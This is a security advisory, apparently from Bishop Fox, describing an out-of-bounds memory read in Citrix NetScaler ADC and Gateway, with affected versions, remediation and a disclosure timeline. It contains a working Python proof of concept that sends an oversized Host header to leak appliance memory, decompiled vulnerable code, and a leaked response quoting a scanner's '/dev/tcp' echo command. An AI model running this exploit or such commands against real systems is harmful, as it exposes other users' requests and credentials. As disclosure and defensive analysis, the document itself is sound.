OOB Memory Read: Netscaler ADC and Gateway


Product Vendor

Cloud Software Group

Product Description

The affected Citrix NetScaler ADC and Gateway components are used for Authentication, Authorization, and Auditing (AAA), and remote access.

Vulnerabilities List

One vulnerability was identified within Citrix Netscaler ADC and Gateway:

  • Out-Of-Bounds Memory Read

Affected Version

  • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-12.35
  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-51.15
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.21
  • NetScaler ADC 13.1-FIPS before 13.1-37.176
  • NetScaler ADC 12.1-FIPS before 12.1-55.302
  • NetScaler ADC 12.1-NDcPP before 12.1-55.302

NetScaler ADC and NetScaler Gateway version 12.1 is now End Of Life (EOL) and is vulnerable.

Summary of Findings

The vulnerability would enable an unauthenticated attacker to remotely obtain information from a NetScaler appliance configured as a Gateway or AAA virtual server. While similar in nature to CVE-2023-4966, this issue is much less likely to return highly sensitive information to an attacker.

Impact

The vulnerability allows an attacker to recover data from memory. Although in most cases nothing of value is returned, in our own testing of Bishop Fox Cosmos customers we have observed instances where POST request bodies from previous HTTP requests are leaked. Web applications use POST requests to transmit potentially sensitive information (e.g., state or credentials), so that request data should normally be kept private.

Solution

Follow the remediation guidance specified in Citrix security bulletin CTX584986 by installing the following updated software as soon as possible:

  • NetScaler ADC and NetScaler Gateway 14.1-12.35 and later releases
  • NetScaler ADC and NetScaler Gateway 13.1-51.15 and later releases of 13.1
  • NetScaler ADC and NetScaler Gateway 13.0-92.21 and later releases of 13.0
  • NetScaler ADC 13.1-FIPS 13.1-37.176 and later releases of 13.1-FIPS
  • NetScaler ADC 12.1-FIPS 12.1-55.302 and later releases of 12.1-FIPS
  • NetScaler ADC 12.1-NDcPP 12.1-55.302 and later releases of 12.1-NDcPP

Out-Of-Bounds Memory Read

NetScaler ADC and Gateway products were vulnerable to an unauthenticated out-of-bounds memory read which could be exploited to capture information from the appliance’s process memory, including HTTP request bodies.

Vulnerability Details

CVE ID: The vendor has updated CVE-2023-6549 to account for this vulnerability, along with the original denial of service vulnerability, as they are remediated by the same fix.

Vulnerability Type: Out-Of-Bounds Read

Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if other, please specify)

Impact: ☐ Code execution, ☐ Denial of service, ☐ Escalation of privileges, ☒ Information disclosure, ☐ Other (if other, please specify)

Security Risk: ☐ Critical, ☒ High, ☐ Medium, ☐ Low

Vulnerability: CWE-125 (Out-Of-Bounds Read)

Bishop Fox staff determined that prior releases of NetScaler ADC and Gateway products were vulnerable to an unauthenticated out-of-bounds memory read and exploited the vulnerability to capture information from the appliance’s process memory, including HTTP request bodies.

Bishop Fox staff determined that the Gateway or AAA virtual server performs unsafe handling of the HTTP Host request header when handling HTTP GET requests for the /nf/auth/startwebview.do URI. The vulnerable function calculates the length of a string containing the Host header and then directs a subsequent function to copy a string of that length into an HTTP response message. However, incorrect use of the C snprintf function results in the length exceeding the size of the source buffer, so that unrelated data is copied into the response if the Host header value submitted in the request is longer than approximately 5,394 bytes. Authentication is not required to exploit this vulnerability.

The following Python proof-of-concept code can be used to demonstrate exploitability when executed against a vulnerable appliance:

import requests
url = "https://<HOST>/nf/auth/startwebview.do"  # <HOST> is a placeholder for the appliance under test
r = requests.get(url, headers={"Host": "A" * 0x5000}, verify=False)

print(r.content[0x1800:])

Figure 1 – Proof-of-concept exploit code

Requests to the /nf/auth/startwebview.do URI are handled by the ns_aaa_start_webview_for_authv3 function. The ns_aaa_start_webview_for_authv3 function constructs an XML response using the snprintf function and returns this response to the user by calling the ns_vpn_send_response function, as shown below:

sprintf(print_temp_rule,"%s%.*s%s",proto,iVar5 - (int)host_hdr,host_hdr,
  "/nf/auth/doWebview.do");
length = snprintf(&ns_HttpRedirectPkt,0x1800,
  "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>"
  "<AuthenticateResponse xmlns=\"http://citrix.com/authentication/response/1\">"
  "<Status>success</Status><Result>more-info</Result><StateContext></StateContext>"
  "<AuthenticationRequirements><PostBack>/nf/auth/webview/done</PostBack>"
  "<CancelPostBack>/nf/auth/doLogoff.do</CancelPostBack>"
  "<CancelButtonText>Cancel</CancelButtonText><Requirements><Requirement>"
  "<Credential><ID>samlResponse</ID><Type>webview</Type>"
  "<wv:WebView xmlns:wv=\"http://citrix.com/authentication/response/webview/1\">"
  "<wv:StartUrl>%.*s</wv:StartUrl></wv:WebView></Credential>"
  "<Label><Type>none</Type></Label><Input/></Requirement></Requirements>"
  "</AuthenticationRequirements></AuthenticateResponse>",
  length,print_temp_rule);
ns_vpn_send_response(lVar1,0x980200,&ns_HttpRedirectPkt,length);

Figure 2 – Excerpt of decompiled ns_aaa_start_webview_for_authv3 function

The ns_vpn_send_response function sends an HTTP response where the body and size of the body are provided as parameters. In the code shown above, the size is set to the return value from the snprintf function. According to the documentation for the snprintf function, the return value is the number of characters that would have been written if enough space had been available. Therefore, if the constructed response would have exceeded the buffer size (0x1800 bytes in this case), the ns_vpn_send_response function will respond with extra data past the end of the buffer. This is identical to the underlying cause of CVE-2023-4966 (CitrixBleed).
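The following C program is an added illustration of the root cause described above, not NetScaler code: it models a fixed-size response buffer of 0x1800 bytes, a vulnerable builder that passes snprintf's return value straight through as the byte count to send, and a hardened builder that treats a return value of sizeof(buf) or more as truncation. The XML template, buffer name and helper functions are simplified stand-ins chosen for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RESP_CAP 0x1800  /* same size as the response buffer in Figure 2 */

/* Stand-in for the fixed-size response packet buffer. */
static char resp_buf[RESP_CAP];

/* Shortened stand-in for the XML template; the real one is far longer. */
static const char *TEMPLATE =
    "<AuthenticateResponse><wv:StartUrl>%.*s</wv:StartUrl></AuthenticateResponse>";

/* Vulnerable pattern: snprintf returns the length the full output WOULD have
 * had, so for a long start_url this exceeds RESP_CAP. A sender that trusts it
 * transmits resp_buf plus whatever memory follows it. */
static long vulnerable_body_len(const char *start_url, int url_len) {
    int n = snprintf(resp_buf, sizeof resp_buf, TEMPLATE, url_len, start_url);
    return n;
}

/* Hardened pattern: any return value >= sizeof(buf) means the output was
 * truncated; refuse to send rather than report a length the buffer cannot back. */
static long fixed_body_len(const char *start_url, int url_len) {
    int n = snprintf(resp_buf, sizeof resp_buf, TEMPLATE, url_len, start_url);
    if (n < 0 || (size_t)n >= sizeof resp_buf)
        return -1;  /* encoding error or truncation: caller must not send */
    return n;
}

/* Constructed input: a start_url of host_len 'A' bytes, standing in for an
 * oversized Host header. Runs the chosen builder and returns its length. */
static long len_for_host(size_t host_len, int use_fixed) {
    char *host = malloc(host_len + 1);
    if (!host) return -1;
    memset(host, 'A', host_len);
    host[host_len] = '\0';
    long n = use_fixed ? fixed_body_len(host, (int)host_len)
                       : vulnerable_body_len(host, (int)host_len);
    free(host);
    return n;
}

/* Bytes beyond the buffer that the vulnerable path would hand to the sender. */
static long bytes_past_buffer(size_t host_len) {
    long n = len_for_host(host_len, 0);
    return n > RESP_CAP ? n - RESP_CAP : 0;
}

int main(void) {
    printf("vulnerable length for 0x5000-byte host: %ld (buffer is %d)\n",
           len_for_host(0x5000, 0), RESP_CAP);
    printf("bytes past buffer: %ld; hardened builder returns %ld\n",
           bytes_past_buffer(0x5000), len_for_host(0x5000, 1));
    return 0;
}
```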

The unsafe use of the sprintf function in the ns_aaa_start_webview_for_authv3 function is discussed in more detail in the Insecure String Handling finding of this report.

Bishop Fox staff analyzed prior releases of vulnerable Citrix deployments and observed instances where the disclosed memory contained data from HTTP requests, sometimes including POST request bodies. For example, the response below includes data from another HTTP request processed by the appliance, apparently related to a Nessus vulnerability scan:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?> 
  <AuthenticateResponse xmlns="http://citrix.com/authentication/response/1"> 
    <Status>success</Status> 
    <Result>more-info</Result> 
    <StateContext></StateContext> 
    <AuthenticationRequirements> 
      <PostBack>/nf/auth/webview/done</PostBack> 
      <CancelPostBack>/nf/auth/doLogoff.do</CancelPostBack> 
      <CancelButtonText>Cancel</CancelButtonText> 
      <Requirements> 
        <Requirement> 
          <Credential> 
          <ID>samlResponse</ID> 
          <Type>webview</Type> 
          <wv:WebView xmlns:wv="http://citrix.com/authentication/response/webview/1"> 
          <wv:StartUrl>https://[...omitted for brevity...] 
            /Citrix/[REDACTED]/cgi-bin/ncbook/book.cgi ck.cgi 0-c%20%22echo%20exploited_port[80]by_nessus%20%26gt;/dev/tcp/[REDACTED]/41418") 20%23 xt=1 %22stdClass%22%3a3%3a%7bs%3a3%3a%22mod%22%3bs%3a15%3a%22resourcesmodule%22%3bs%3a3%3a%22src%22%3bs%3a20%3a%22%40random41940ceb78dbb%22%3bs%3a3%3a%22int%22%3bs%3a0%3a%22%22%3b%7d[...omitted for brevity...]

Figure 3 – NetScaler appliance response disclosing memory content

Affected Locations

URI

/nf/auth/startwebview.do

Function

ns_aaa_start_webview_for_authv3 in /netscaler/nsppe

Credits

  • Capability Development Group at Bishop Fox

Timeline

  • 01/22/2024: Initial discovery
  • 01/25/2024: Contact with vendor
  • 02/01/2024: Vendor acknowledged vulnerabilities
  • 05/06/2024: Vulnerabilities publicly disclosed
  • 05/10/2024: Vendor updates security bulletin to confirm that the fix for denial of service in CVE-2023-6549 also addresses the out-of-bounds memory read


About the author, Bishop Fox

Security Experts

Due to the nature in which we conduct research and penetration tests, some of our security experts prefer to remain anonymous. Their work is published under our Bishop Fox name.

Bishop Fox is the leading authority in offensive security, providing solutions ranging from continuous penetration testing, red teaming, and attack surface management to product, cloud, and application security assessments. We’ve worked with more than 25% of the Fortune 100, half of the Fortune 10, eight of the top 10 global technology companies, and all of the top global media companies to improve their security. Our Cosmos platform, service innovation, and culture of excellence continue to gather accolades from industry award programs including Fast Company, Inc., SC Media, and others, and our offerings are consistently ranked as “world class” in customer experience surveys. We’ve been actively contributing to and supporting the security community for almost two decades and have published more than 16 open-source tools and 50 security advisories in the last five years. Learn more at bishopfox.com or follow us on Twitter.
